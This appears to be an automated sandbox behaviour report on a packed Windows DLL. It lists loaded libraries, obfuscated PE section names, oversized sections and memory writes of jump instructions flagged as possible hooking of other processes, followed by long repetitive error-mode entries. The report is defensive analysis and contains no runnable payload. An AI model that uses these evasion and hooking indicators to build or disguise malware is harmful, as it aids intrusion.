Source: C:\Windows\System32\loaddll32.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: olepro32.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: security.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{2087c2f4-2cef-4953-a8ab-66779b670495}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: 5.dll

Static file information: File size 26549367 > 1048576

Source: 5.dll	Static PE information: Raw size of .IiZ_A$8 is bigger than: 0x100000 < 0x4c3e00
Source: 5.dll	Static PE information: Raw size of ]8;-`=q( is bigger than: 0x100000 < 0xa19400
Source: 5.dll	Static PE information: Raw size of pCck@0(< is bigger than: 0x100000 < 0x9bfc00

Source: initial sample

Static PE information: section where entry point is pointing to: pCck@0(<

Source: 5.dll	Static PE information: section name: .IiZ_A$8
Source: 5.dll	Static PE information: section name: bO\=]JeA
Source: 5.dll	Static PE information: section name: >9P5ZP$
Source: 5.dll	Static PE information: section name: \(SnMqUq
Source: 5.dll	Static PE information: section name: cKc<oclJ
Source: 5.dll	Static PE information: section name: L2(#1D;
Source: 5.dll	Static PE information: section name: 1eWe9Dpo
Source: 5.dll	Static PE information: section name: PC2X@$2+
Source: 5.dll	Static PE information: section name: ]8;-`=q(
Source: 5.dll	Static PE information: section name: Rjm*8iMX
Source: 5.dll	Static PE information: section name: pCck@0(<
Source: 5.dll	Static PE information: section name: M;H3Mr
Source: 5.dll	Static PE information: section name: U(#)2R<D

Hooking and other Techniques for Hiding and Protection

Overwrites code with unconditional jumps - possibly settings hooks in foreign process

Source: C:\Windows\System32\loaddll32.exe	Memory written: PID: 7280 base: 690007 value: E9 EB DF 01 77	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Memory written: PID: 7280 base: 776ADFF0 value: E9 1E 20 FE 88	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 7396 base: 2F30007 value: E9 EB DF 77 74	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 7396 base: 776ADFF0 value: E9 1E 20 88 8B	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 7432 base: 3240007 value: E9 EB DF 46 74	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 7432 base: 776ADFF0 value: E9 1E 20 B9 8B	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 7500 base: 6520007 value: E9 EB DF 18 71	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 7500 base: 776ADFF0 value: E9 1E 20 E7 8E	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 7540 base: 7A0007 value: E9 EB DF F0 76	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 7540 base: 776ADFF0 value: E9 1E 20 0F 89	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 7972 base: 2960007 value: E9 EB DF D4 74	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 7972 base: 776ADFF0 value: E9 1E 20 2B 8B	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 7980 base: 2F80007 value: E9 EB DF 72 74	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 7980 base: 776ADFF0 value: E9 1E 20 8D 8B	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 7992 base: 30D0007 value: E9 EB DF 5D 74	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 7992 base: 776ADFF0 value: E9 1E 20 A2 8B	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 8004 base: 48B0007 value: E9 EB DF DF 72	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 8004 base: 776ADFF0 value: E9 1E 20 20 8D	Jump to behavior

Source: C:\Windows\System32\loaddll32.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
